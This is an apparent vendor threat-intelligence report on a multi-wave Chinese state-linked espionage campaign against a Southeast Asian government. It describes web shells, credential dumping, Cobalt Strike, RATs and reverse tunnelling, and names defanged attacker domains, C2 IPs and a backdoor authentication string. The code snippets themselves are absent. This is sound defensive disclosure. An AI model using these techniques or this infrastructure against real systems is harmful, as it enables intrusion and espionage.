Persistent Attempts at Cyberespionage Against Southeast Asian Government Target Have Links to Alloy Taurus (original) (raw)

Executive Summary

We observed a series of intrusions directed at a Southeast Asian government target, a cluster of activity that we attribute with a moderate level of confidence to Alloy Taurus, a group believed to be operating on behalf of Chinese state interests. The multiwave intrusions, which started in early 2022 and persisted throughout 2023, capitalized on vulnerabilities in Exchange Servers to deploy a large number of web shells.

These web shells served as gateways for the introduction of additional tools and malware, some specially crafted for the target environments. These incursions were consistent with techniques used for long-term espionage operations and appeared to be attempts to establish a resilient foothold within the compromised networks.

We found this activity as part of an investigation into compromised environments within a Southeast Asian government. We identified this cluster of activity as CL-STA-0045.

Drawing upon available telemetry and threat intelligence, we attribute this cluster of activity with a moderate level of confidence to the Alloy Taurus group, also known as GALLIUM. This group is widely believed to operate on behalf of Chinese state interests and has been observed in multiple espionage campaigns targeting telecommunication companies and government entities across Southeast Asia, Europe and Africa.

Our description of this cluster of activity provides deep technical insights into the tools and approaches used by the APT and a timeline of activity, providing a rich set of indicators for use by defenders.

Palo Alto Networks customers receive protections against the threats discussed in this article through Advanced WildFire, Advanced URL Filtering, DNS Security, Cortex XDR and Cortex XSIAM, as detailed in the conclusion.

Organizations can engage the Unit 42 Incident Response team for specific assistance with this threat and others.

Related Unit 42 Topics Government, APTs
Alloy Taurus akas GALLIUM, Softcell

Timeline of Activity

Image 1 is a timeline of CLA-STA-0045. There are six waves of activity in total. The first wave start in quarter 1 of 2022 and continues through quarters two, three and four of 2022, and quarters one through three of 2023.

Figure 1. Timeline of CL-STA-0045.

CL-STA-0045 Details

From Web Shell to Interactive Attack

Each wave of CL-STA-0045 activity started after the attackers gained access to the network and installed several web shells, including China Chopper, on several internet-facing web servers. Using the web shells, the attackers were able to perform an interactive attack that included running reconnaissance commands and tools (e.g., whoami, ipconfig, dir, arp and net, NBTScan) and creating several administrative accounts (named Admin$, Back$, infoma$ and testuser).

The attackers used these accounts to perform additional activities, as shown in Figure 2.

Image 2 is a screenshot of an alert in Cortex XDR. Alert Description: [Redacted] performed 268 new administrative actions in the last twelve hours. This is an uncharacteristically high number of new administrative actions for [redacted].

Figure 2. Suspicious administrative actions alert.

The attackers also used two scanners. The first was Fscan, which is an open-source internal network scanner written by a Mandarin speaker called “shadow1ng.” Various research organizations have reported multiple Chinese APT groups using this tool. The second scanner was WebScan, a browser-based network IP scanner and local IP detector.

Undocumented .NET Backdoors

Following the creation of the users and the reconnaissance activity, the attackers attempted to execute a previously undocumented .NET backdoor, which they named windows.exe. We named this threat Reshell based on its program database (PDB) path.

The attackers configured the backdoor, which is relatively straightforward and simple, to communicate with the IP 23.106.122[.]46. This gave the attackers an easy way to execute arbitrary commands remotely.

Image 3 is a screenshot of six lines of code. This is the embedded command and control in the Reshell binary.

Figure 3. Embedded C2 in the Reshell binary.

After Cortex XDR prevented execution of the Reshell backdoor, the attackers likely suspected something was not right and tried to check for the connection using the netstat command. They searched for IP addresses in the range of 23.106* and they made a connectivity check, as shown in Figure 4.

Image 4 is a screenshot of a tree diagram in Cortex XDR. The tree begins with httpd.exe. Some information is redacted. Included are two commands as well as the action Cortex XDR took (blocking).

Figure 4. Reshell execution and connectivity check.

The attackers tried to execute another undocumented .NET backdoor, which we call Zapoa. This backdoor opens an HTTP listener, specifically looking for inbound requests to the server that match the following UrlPrefix, which contains a wildcard to match all hostnames within the URL: https://*:443/256509101/.

This backdoor uses the string P88smzTpVBDjwiUv within the HTTP POST data to authenticate its C2. It provides the operator a wide range of capabilities, including:

Preparing the Ground

The attackers continued to perform additional activities to maintain a foothold in the environment. To prepare the ground, bypass security mitigation efforts and hide from the security team, the attackers installed SoftEther VPN software.

The attacker renamed the SoftEther VPN file to Taskllst.exe, as shown in Figure 5. In other instances, they renamed it to fonts.exe and vmtools.exe.

Using this software, the attackers connected to different hosts inside and outside the network such as GitHub (as observed in Figure 5). They also downloaded additional tools such as Kerbrute, LsassUnhooker and GoDumpLsass, which they used in the next phase of the attack.

Image 5 is a screenshot of a table in Cortex XDR. The column are, from left to right, Source Process Name, Source Signer, and Destination Host. Two .exe files are listed. The signer for both is the SoftEther corporation. The destination host is GitHub.

Figure 5. Connection to GitHub by SoftEther VPN - taskllst.exe.

Stealing Credentials

Since the attackers had already gained a local administrator account, the next step was to gain domain credentials to move laterally inside the network. To do so, the attackers tried different techniques and tools.

Image 6 is a screenshot of a tree diagram in Cortex XDR. The tree begins with httpd.exe. Some information is redacted. Included are two commands as well as the action Cortex XDR took (blocking).

Figure 6. Detection and prevention of Kerbrute and GoDumpLsass execution.

A string of code that allows an attacker to search for passwords within configuration files.

A string of code to dump the Lsass process.

The attackers also tried other tools to dump the Lsass process, including the following:

Image 7 is a screenshot of a tree diagram in Cortex XDR. Some information is redacted. The tree splits once and has four branches. Included are the commands used by the threat actor. The main action prevented is InternalMonologue.exe.

Figure 7. Detection and prevention of NTLM downgrade attack and credential theft.

Targeting Critical Assets

After obtaining credentials, the attackers attempted to move laterally inside the network, aiming specifically at web servers and domain controllers.

The attackers first tried using the SoftEther VPN, attempting to create connections to the targets on SMB (port 445). Later in the attack, the attackers changed their tactic and moved laterally by abusing the remote administration tool AnyDesk. This tool was already present in the compromised environment.

The attackers set the password for AnyDesk to be J9kzQ2Y0qO, which is the same password reported multiple times as being used in Conti ransomware attacks.

Command line to set password

We observed no attempt to execute ransomware.

Installing Additional Tools

In addition to the already installed tools mentioned above, the attackers attempted to install other tools and malware to help perform malicious activities and maintain a foothold in the environment. Among these tools were the following:

Cobalt Strike

The attackers attempted to create a connection to the domain images.cdn-sina[.]tw to download a file named scvhost.txt. This file was a Cobalt Strike beacon, which Figure 8 shows Cortex XDR prevented from executing.

Image 8 is a screenshot of a tree diagram in Cortex XDR. The tree splits once and has four branches. Included are the commands used by the threat actor. Two actions are prevented: scvhost.text and result.txt.

Figure 8. Blocked execution of payloads from images.cdn-sina[.]tw.

In another attempt to execute Cobalt Strike, the attackers created services to run the beacon (Reset.cpl, help.exe) using the living-off-the-land binaries and scripts (LOLBAS) method of abusing the Windows Shell Common DLL (Shell32.dll), as highlighted in the below code snippet and shown in full in Figure 9.

A string of code that abuses Shell32.dll.

Image 9 is a screenshot of a tree diagram in Cortex XDR. The tree splits once and has three branches. Included are the commands used by the threat actor. The execution of Cobalt Strike is blocked.

Figure 9. Blocked execution of Cobalt Strike by abusing the Windows Shell Common DLL.

Reverse SSH Tunneling

Attackers established a reverse Secure Shell (SSH) tunnel that allowed direct Remote Desktop Protocol (RDP) connection to the compromised host so they could interact with AnyDesk remotely. To do this, the attackers tried to use HTran (lcx.111) to tunnel RDP connections to its C2 (154.55.128[.]129, as shown in Figure 10).

In an attempt to overcome the mitigation efforts, the attackers also tried using another tool to perform this SSH tunneling called PuTTY. The attackers downloaded a file named result.txt from the same domain mentioned above (images.cdn-sina[.]tw), which is the PuTTY binary.

Using the PuTTY binary in one compromised environment, the attackers attempted to create an SSH tunnel to 159.223.85[.]37. In another compromised environment, the attackers tried to tunnel to both that IP and 156.251.162[.]29.

The attackers kept using those tools, sometimes with the same naming convention and the same infrastructure, across multiple victims in the government sector in the Southeast Asian country.

Image 10 is a screenshot of a tree diagram with two branches in Cortex XDR. This demonstrates the program detection and then preventing the execution of HTran and Plink. Some information has been redacted.

Figure 10. Detection and prevention of HTran and Plink execution.

Downloading Additional Tools via PowerShell

In addition to Cobalt Strike and PuTTY, which the attackers downloaded from images.cdn-sina[.]tw, they also used another subdomain (Shell.cdn-sina[.]tw, resolved to 78.142.246[.]117). Attackers used it to store additional tools including victim-specific scripts.

To access those tools, the attackers used Windows Management Instrumentation (WMI) and PowerShell with the following command line.

A string of code used to access stored additional tools.

Attackers tried to bypass some antivirus detection of download string operations (i.e., searching for certain keywords, such as DownloadString).

The attackers also downloaded PowerCat (the PowerShell version of the networking utility netcat) from the same domain, using the IP this time. They then ran this utility with the same IP previously used by the attackers as a parameter for Plink.

A string of code to run the utility netcat.

Quasar RAT

Another type of malware that the attackers attempted to use is Quasar RAT. Different threat actors around the world use this off-the-shelf tool. The malware provides its operator with a wide set of capabilities, including the following:

As observed in Figure 11, the actor put the Quasar RAT dropper (l.exe) in the C:/Recovery folder, which dropped the Quasar RAT loader (loader.any) and tried to execute it.

Image 11 is a screenshot of a tree diagram in Cortex XDR. The tree splits once and has two branches. Two actions are prevented (blocked). These are l.exe and regsvr32.exe Loader.any.

Figure 11. Prevention of Quasar RAT execution.

HDoor

The attacker also used a customized version of the Chinese backdoor HDoor. HDoor has been publicly available in Chinese forums since at least 2008. Various research organizations have reported that multiple Chinese APT groups have used this threat, such as Growing Taurus (aka Naikon) and Parched Taurus (aka Goblin Panda).

HDoor is equipped with full backdoor capabilities, allowing the operator to perform a variety of tasks, including the following:

HDoor was executed using the following command line arguments:

A string of code to execute Hdoor.

Gh0stCringe RAT

Another piece of malware that the attackers tried to use is Gh0stCringe, which is based on the source code of Gh0st RAT. The attackers tried to execute this tool twice, with a gap of over 10 days between executions.

In the first execution, the attackers attempted to execute the malware dropper, which was named Cssrs.exe. This dropped the Gh0stCringe binary, named moon.exe, and executed it. Figure 12 shows this activity.

Image 12 is a screenshot of a diagram in Cortex XDR. The execution of moon.exe is blocked.

Figure 12. Gh0stCringe process tree.

The second time, the attackers tried to execute Gh0stCringe by the name conhost.exe as shown in Figure 13. They created the malware under the ESET folder C:\ProgramData\ESET\RemoteAdministrator\Agent\conhost.exe.

Although this folder is legitimate and contains ESET-related files that were legitimately installed in the victim’s environment, the use of this folder to store malicious payloads is not common.

However, we note that in the same environment, we saw the threat actors behind a different cluster, CL-STA-0044 abusing ERAAgent.exe to execute the ToneShell malware.

Image 13 is a screenshot of a tree diagram in Cortex XDR. The tree splits once and has two branches. Included are the commands used by the threat actor. The commands used by the attackers are included. The execution of conhost.exe is blocked. Some information is redacted.

Figure 13. Executing Gh0stCringe from the ESET folder.

A Variant of the Winnti Malware

In January 2023, we observed the actors attempting to install a variant of the Winnti malware family. According to an April 11, 2013, blog written by Kaspersky, Winnti is a prominent malware family used by multiple Chinese threat groups since at least 2011.

To install this particular variant of Winnti, the actor saved two files (rs.exe and s.dll) to the system within the folder D:\HPEOneView\\admin\.!\.dump. The rs.exe executable is a loader that copies the s.dll payload to the location %SYSTEM%\lscsrv.dll and creates a service named Lscsrv with it.

This beacon leads us to believe this is a variant of the Winnti malware. This beacon has several overlaps compared to the beacon created by the Winnti malware discussed in Kaspersky’s blog:

At a high level, this Winnti variant has the following capabilities available for the actor to use:

Attribution

We identified CL-STA-0045 activity on multiple entities of the same government in Southeast Asia around the same time frame. The clustering of the activity was based on the use of the same tools, malware, similar techniques and tactics, and in some cases shared infrastructure.

Analysis of activity of the threat actor behind CL-STA-0045, in combination with third-party reporting, presents noteworthy overlaps with the reported modus operandi of Alloy Taurus (aka GALLIUM).

The threat actor used a combination of tools and malware during its operation that, when grouped together in a single operation, presents a rather unique playbook.

As part of this cluster of activity, some of the main tools used together include the following:

The combination of these tools in a single operation has only been previously reported as part of Alloy Taurus operations.

In addition, our analysis of the activity showed a repetitive style of attack, in which the threat actor attacked in waves. Each wave started with web server exploitation as well as installation of web shells and reconnaissance. This was then followed by the deployment of additional tools. This manner of operation, with the tools listed above, overlaps with the behavior reported in Operation SoftCell.

Furthermore, the Unit 42 internal telemetry we’ve presented included an infrastructure overlap with the activity described in CL-STA-0045, and it was observed on one of the compromised entities belonging to the same government. The threat actor behind this cluster used a renamed SoftEther VPN to hide their connection to its C2 server.

In one instance of this activity cluster, the communication we observed was to an infrastructure that overlaps with the IP address 196.216.136[.]139 that we mentioned in our post Chinese Alloy Taurus Updates PingPull Malware. Our telemetry also suggests that Alloy Taurus was active in the same environment in Q3 and Q4 of 2022, which aligns with CL-STA-0045 activity from a timeline perspective.

We observed the activity specifically associated with CL-STA-0045 targeting the government sector in Southeast Asia. Alloy Taurus was previously reported to target the government sector in that region.

The combination of tools used in CL-STA-0045, the analysis of the threat actor’s modus operandi, the victimology of this cluster and overlaps with Unit 42 internal telemetry led us to estimate with a moderate level of confidence that the threat actor behind CL-STA-0045 is likely the Alloy Taurus APT group.

Conclusion

CL-STA-0045 activity represents a significant threat to government entities in South East Asia. The threat actor behind this cluster employed a mature approach, utilizing multiwave intrusions and exploiting vulnerabilities in Exchange Servers as their main penetration vector. We estimate that the main goal behind the activity was to facilitate long-term espionage operations.

Based on the available telemetry, we attribute this cluster of activity with a moderate level of confidence to the Alloy Taurus group. This threat actor poses a significant threat to regional security and warrants heightened attention from affected organizations and governments in the region.

The findings of this investigation underscore the urgent need for enhanced security measures, vigilant monitoring and proactive threat intelligence sharing among government entities and affected industries in Southeast Asia. By adopting a multilayered defense approach and staying informed about emerging threats, organizations can better protect themselves against the persistent and evolving tactics employed by threat actors such as Alloy Taurus.

Protections and Mitigations

For Palo Alto Networks customers, our products and services provide the following coverage associated with the threats described above:

If you think you may have been impacted or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

Palo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

Web Shells

Reshell Backdoor

Zapoa Backdoor

Cobalt Strike

Quasar RAT

HDoor

Gh0stCringe RAT

Fscan

WebScan

Kerbrute

LsassUnhooker

InternalMonologue.exe

Infrastructure

Reshell URI Pattern

Additional Resources